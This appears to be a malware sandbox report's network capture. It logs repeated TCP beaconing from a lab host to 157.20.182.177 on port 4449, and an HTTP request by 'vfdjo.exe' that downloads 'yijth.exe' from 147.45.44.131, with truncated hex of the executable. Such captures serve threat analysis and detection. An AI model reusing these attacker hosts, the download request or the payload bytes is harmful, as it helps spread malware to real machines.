Jan 1, 2025 08:54:24.115770102 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:24.207361937 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:24.213335037 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:24.218116045 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:24.218219995 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:24.223059893 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:38.694824934 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:38.699625969 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:38.699701071 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:38.704536915 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:38.988071918 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:39.037724972 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:39.122682095 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:39.124330044 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:39.129127026 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:39.129184008 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:39.134061098 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:53.616369963 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:53.624407053 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:53.624558926 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:53.630598068 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:53.909178019 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:53.959645987 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:54.038697958 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:54.040796041 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:54.045521021 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:54.045583010 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:54.050370932 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:08.538233042 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:08.543219090 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:08.543298960 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:08.548109055 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:08.832968950 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:08.881505013 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:08.962680101 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:08.964490891 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:08.969372034 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:08.969448090 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:08.974276066 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:23.462584019 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:23.467479944 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:23.471110106 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:23.475929976 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:23.752985001 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:23.803422928 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:23.898009062 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:23.904617071 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:23.909410000 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:23.909527063 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:23.914417982 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:38.520970106 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:38.525867939 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:38.525939941 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:38.530744076 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:38.909218073 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:38.959705114 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:39.038958073 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:39.040800095 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:39.045595884 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:39.045685053 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:39.050487995 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:52.819664955 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:52.824573040 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:52.824645996 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:52.829435110 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:53.118448973 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:53.162873983 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:53.247478962 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:53.249475002 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:53.254256010 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:53.254307032 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:53.259094000 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:54.522814989 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:54.527807951 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:54.527867079 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:54.532643080 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:54.815453053 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:54.866067886 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:54.942859888 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:54.944782019 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:54.949528933 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:55:54.949692965 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:55:54.954547882 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:00.211194038 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:00.216166973 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:00.216264963 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:00.221036911 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:00.528803110 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:00.584764957 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:00.668581009 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:00.670784950 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:00.675609112 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:00.675657988 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:00.680376053 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:15.072367907 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:15.077312946 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:15.077403069 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:15.082210064 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:15.364870071 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:15.477300882 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:15.499123096 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:15.510656118 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:15.515434027 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:15.515544891 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:15.520342112 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:16.259227991 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:16.264045000 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:16.267321110 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:16.272089958 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:16.550261021 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:16.678555965 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:16.678700924 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:16.680691957 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:16.685482979 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:16.685528994 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:16.690397978 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:19.788465023 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:19.793442965 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:19.793556929 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:19.798393011 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:20.081372023 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:20.162997961 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:20.210819006 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:20.272344112 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:20.477718115 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:20.482601881 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:20.482667923 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:20.487514973 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:33.600795031 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:33.605794907 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:33.605855942 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:33.610582113 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:33.894017935 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:33.944241047 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:34.018990040 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:34.020767927 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:34.025552034 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:34.025672913 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:34.030436993 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:48.522754908 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:48.528296947 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:48.531409025 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:48.536307096 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:48.816642046 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:48.866173029 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:48.946841002 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:48.952528954 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:48.957432985 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:48.957650900 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:48.962543011 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:53.632265091 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:53.637399912 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:53.637465954 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:53.642339945 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:53.936167002 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:53.991231918 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:54.062865019 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:54.064774990 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:54.069593906 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:56:54.069653034 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:56:54.074491978 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:08.555344105 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:08.561738968 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:08.561885118 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:08.567727089 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:08.847242117 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:08.899348974 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:08.984810114 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:08.986588001 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:08.991394043 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:08.991620064 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:08.996465921 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:23.493138075 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:23.498080969 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:23.498193979 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:23.503042936 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:23.786679029 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:23.835031986 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:23.919339895 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:23.921694040 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:23.926517010 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:23.926564932 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:23.931363106 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:30.946428061 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:30.951585054 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:30.951694965 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:30.956728935 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:31.240034103 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:31.289897919 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:31.370769024 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:31.375684977 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:31.380496979 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:31.380594969 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:31.385374069 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:31.882369995 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:31.887320042 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:31.887370110 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:31.892133951 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:32.214665890 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:32.256891966 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:32.342912912 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:32.347702980 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:32.352462053 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:32.352509975 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:32.357361078 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:33.029656887 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:33.034581900 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:33.034645081 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:33.039413929 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:33.333168983 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:33.385451078 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:33.462876081 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:33.465451002 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:33.470216036 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:33.470345020 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:33.475106001 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:42.993515015 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:42.998539925 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:42.998646021 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:43.003448009 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:43.300348043 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:43.353579998 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:43.434879065 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:43.443016052 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:43.448421955 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:43.449609041 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:43.454916954 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:49.944916010 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:49.949906111 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:49.949987888 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:49.954722881 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:50.268117905 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:50.319482088 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:50.398858070 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:50.400633097 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:50.405477047 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:57:50.405637980 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:57:50.410516977 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:02.491821051 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:02.496851921 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:02.497541904 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:02.502283096 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:02.785702944 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:02.835133076 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:02.914815903 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:02.917268991 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:02.922714949 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:02.922830105 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:02.927721977 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:07.992460012 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:07.997339010 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:07.999511957 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:08.004277945 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:08.285110950 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:08.335131884 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:08.414844990 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:08.415559053 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:08.420403957 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:58:08.420465946 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:58:08.425261974 CET	4449	49731	157.20.182.177	192.168.2.4

HTTP Request Dependency Graph

147.45.44.131

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	147.45.44.131	80	7508	C:\Users\user\Desktop\vfdjo.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 08:54:00.911398888 CET	181	OUT	GET /infopage/yijth.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive
Jan 1, 2025 08:54:01.550087929 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 07:54:01 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sat, 28 Dec 2024 19:34:32 GMT ETag: "2fdc00-62a59ab2b1730" Accept-Ranges: bytes Content-Length: 3136512 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 be e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 e8 2f 00 4b 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf\g// 0@ @0@p/K0 0 H.text/ / `.rsrc0/@@.reloc 0/@B/HXG<4#Vwd!HAZI1YT8Dc[2njlOs]yx<mt8*B-rIg:mej{Um79;$QWAA0V0yh`4bE=WM&,C:])#lAG8B3O);"L"p<19;YF 8fK?WEw:7i(}jY2]u{1Crh:bvJn5)catiS
Jan 1, 2025 08:54:01.550101042 CET	224	IN	Data Raw: 11 89 2f 72 36 a1 94 38 58 9a bb 18 91 fb 4e c5 64 e1 97 2f 07 e7 ba 86 13 0a 78 65 4e fc 5b 19 3e a0 8e d0 c0 1a 46 24 82 79 27 45 7d 83 c6 86 2b fe 09 f9 69 47 f3 3c 64 db 37 92 86 4a a5 7a 63 60 fa 2f 48 7f 7a 0d c8 09 32 7b 19 3b 66 ca d3 39 Data Ascii: /r68XNd/xeN[>F$y'E}+iG<d7Jzc`/Hz2{;f96t2g)%P7^<$"Pu\|`XEg1FOUZ/MT_sHe`m>F9U+@oV?;eK9=^tLlU%/^}
Jan 1, 2025 08:54:01.550111055 CET	1236	IN	Data Raw: 12 3c 20 62 93 a9 96 30 8d d3 c0 81 38 94 07 68 1f 90 7a f9 3b 19 47 a2 f1 45 62 54 f3 73 e9 1a 3b b7 fc 07 08 ed 15 de 00 9d ca 1c bd ac 65 79 bd b7 3d f1 76 c8 f2 bf b4 90 9c 34 ec e2 2e a0 0a 40 2c 20 70 d6 10 a6 da 72 0f ab 1b 48 8f 56 35 bd Data Ascii: < b08hz;GEbTs;ey=v4.@, prHV5SxBZBv'YoO>=F}vX:h)H"0g0GRXy6/>+#\PPe[\|&XK3'Z58bv&SB?+@vs*
Jan 1, 2025 08:54:01.550127983 CET	1236	IN	Data Raw: b5 bd ca b9 b6 43 27 41 33 34 ad 12 ee b0 49 0e 24 95 ff af ac cf be 75 5e 07 21 d8 7b 23 f1 9e 83 c3 72 8f 18 ec 0b 1a aa ea 86 df 2a 3d bb 60 91 5b 5a c2 2d f1 e1 72 f4 f6 94 ef a8 27 36 ba fb 11 9c 4e cc d8 12 dc 8a f9 a0 ef 1d 00 e2 a3 bb d7 Data Ascii: C'A34I$u^!{#r=`[Z-r'6N'}tl Cda\|0"p+lMG6sYMcgD.X_Dek#:Yz\|L[a2/A?J2Z50j$O:Wyn6[$1]4
Jan 1, 2025 08:54:01.550137997 CET	448	IN	Data Raw: 32 80 6f 0e e9 ac 9e 80 ac e4 51 5d 30 a2 84 95 54 b1 bd a3 6d 0e ea 5f 2f e3 b3 62 ef 7e 2d 8a c0 58 c4 bd 8f 38 72 f9 13 0c 5c b0 9c 42 cb dd 35 48 83 b1 6e a0 5f da 3f 1f d9 2e 84 04 d3 af d8 ef b8 57 00 07 80 c3 00 00 e8 30 8c 81 3d 2e ff 6e Data Ascii: 2oQ]0Tm_/b~-X8r\B5Hn_?.W0=.nw[^Zs_bc6}l2DY$1f^-lyxu!eWf%-V /87.e;ZyKxBiK%%J$#U_yX/P6%LD{
Jan 1, 2025 08:54:01.550223112 CET	1236	IN	Data Raw: 88 cd 66 e2 eb 0a 31 72 e5 7c c9 06 a3 ab f0 3e b2 d7 b9 e5 6f 2b 33 2a 5b 05 6f c7 cd a6 4a 69 2e 02 dd 18 cb 6c 93 b6 05 f6 7c dd 3a 31 1d bc 1d 92 2e 00 2f 00 5c 00 00 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 Data Ascii: f1r\|>o+3*[oJi.l\|:1./\0123456789ABCDEFxV4gE#xV4(ylEq&TsY)}$BZhk0-6_
Jan 1, 2025 08:54:01.550235033 CET	1236	IN	Data Raw: 00 00 e0 03 00 00 29 03 00 00 e7 02 00 00 a8 00 00 00 ce 03 00 00 b0 03 00 00 77 01 00 00 ec 02 00 00 34 00 00 00 58 02 00 00 eb 02 00 00 82 02 00 00 b6 00 00 00 5e 03 00 00 51 00 00 00 58 01 00 00 25 03 00 00 dc 03 00 00 e3 02 00 00 ff 01 00 00 Data Ascii: )w4X^QX%.Nq}E)f3&b
